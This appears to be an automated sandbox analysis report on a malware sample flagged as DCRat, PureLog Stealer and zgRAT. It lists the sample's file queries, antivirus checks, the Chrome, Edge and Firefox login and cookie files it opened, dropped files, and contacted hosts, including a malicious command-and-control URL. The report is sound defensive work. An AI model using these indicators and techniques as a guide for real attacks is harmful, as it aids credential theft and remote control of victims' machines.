Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected DCRat
Source: Yara match File source: 00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: W4tW72sfAD.exe PID: 6988, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: W4tW72sfAD.exe, type: SAMPLE
Source: Yara match File source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: W4tW72sfAD.exe, type: SAMPLE
Source: Yara match File source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality
barindex
Yara detected DCRat
Source: Yara match File source: 00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: W4tW72sfAD.exe PID: 6988, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: W4tW72sfAD.exe, type: SAMPLE
Source: Yara match File source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: W4tW72sfAD.exe, type: SAMPLE
Source: Yara match File source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428727 Sample: W4tW72sfAD.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 78 minecrafthyipixel.xyz 2->78 80 api.telegram.org 2->80 82 ipinfo.io 2->82 94 Snort IDS alert for network traffic 2->94 96 Antivirus detection for URL or domain 2->96 98 Antivirus detection for dropped file 2->98 104 15 other signatures 2->104 8 W4tW72sfAD.exe 21 37 2->8         started        13 juptXkyeRvGsIZrQGeVEsrnWhD.exe 2->13         started        15 juptXkyeRvGsIZrQGeVEsrnWhD.exe 3 2->15         started        17 9 other processes 2->17 signatures3 100 Performs DNS queries to domains with low reputation 78->100 102 Uses the Telegram API (likely for C&C communication) 80->102 process4 dnsIp5 88 api.telegram.org 149.154.167.220, 443, 49732 TELEGRAMRU United Kingdom 8->88 90 ipinfo.io 34.117.186.192, 443, 49730, 49731 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->90 62 C:\Users\user\Desktop\yzZxaXSF.log, PE32 8->62 dropped 64 C:\Users\user\Desktop\oQGhqvNX.log, PE32 8->64 dropped 66 C:\Users\user\Desktop\kdoiNyxj.log, PE32 8->66 dropped 74 14 other malicious files 8->74 dropped 114 Creates an undocumented autostart registry key 8->114 116 Creates multiple autostart registry keys 8->116 118 Drops PE files to the user root directory 8->118 130 3 other signatures 8->130 19 cmd.exe 8->19         started        22 csc.exe 4 8->22         started        25 powershell.exe 8->25         started        29 4 other processes 8->29 68 C:\Users\user\Desktop\wHsyCTFf.log, PE32 13->68 dropped 70 C:\Users\user\Desktop\ndjISZpy.log, PE32 13->70 dropped 72 C:\Users\user\Desktop\fAbTigaR.log, PE32 13->72 dropped 76 7 other malicious files 13->76 dropped 27 cmd.exe 13->27         started        120 Multi AV Scanner detection for dropped file 15->120 122 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->122 124 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 15->124 92 127.0.0.1 unknown unknown 17->92 126 Antivirus detection for dropped file 17->126 128 Machine Learning detection for dropped file 17->128 file6 signatures7 process8 file9 106 Uses ping.exe to sleep 19->106 108 Uses ping.exe to check the status of other devices and networks 19->108 31 juptXkyeRvGsIZrQGeVEsrnWhD.exe 19->31         started        46 3 other processes 19->46 52 C:\Windows\...\SecurityHealthSystray.exe, PE32 22->52 dropped 110 Infects executable files (exe, dll, sys, html) 22->110 34 conhost.exe 22->34         started        36 cvtres.exe 1 22->36         started        112 Loading BitLocker PowerShell Module 25->112 48 2 other processes 25->48 38 juptXkyeRvGsIZrQGeVEsrnWhD.exe 27->38         started        42 conhost.exe 27->42         started        44 conhost.exe 29->44         started        50 3 other processes 29->50 signatures10 process11 dnsIp12 132 Multi AV Scanner detection for dropped file 31->132 84 minecrafthyipixel.xyz 104.21.57.61, 49739, 49740, 49741 CLOUDFLARENETUS United States 38->84 86 172.67.189.92, 49878, 49896, 80 CLOUDFLARENETUS United States 38->86 54 C:\Users\user\Desktop\wexYWbhZ.log, PE32 38->54 dropped 56 C:\Users\user\Desktop\rrfZteSl.log, PE32 38->56 dropped 58 C:\Users\user\Desktop\quERYeDq.log, PE32 38->58 dropped 60 7 other malicious files 38->60 dropped 134 Tries to harvest and steal browser information (history, passwords, etc) 38->134 file13 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.117.186.192
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
172.67.189.92
 unknown United States
13335 CLOUDFLARENETUS false
104.21.57.61
 minecrafthyipixel.xyz United States
13335 CLOUDFLARENETUS true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
ipinfo.io 34.117.186.192 true
api.telegram.org 149.154.167.220 true
minecrafthyipixel.xyz 104.21.57.61 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://minecrafthyipixel.xyz/voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php true
    		unknown
    https://ipinfo.io/country false
      		high
      https://ipinfo.io/ip false
        		high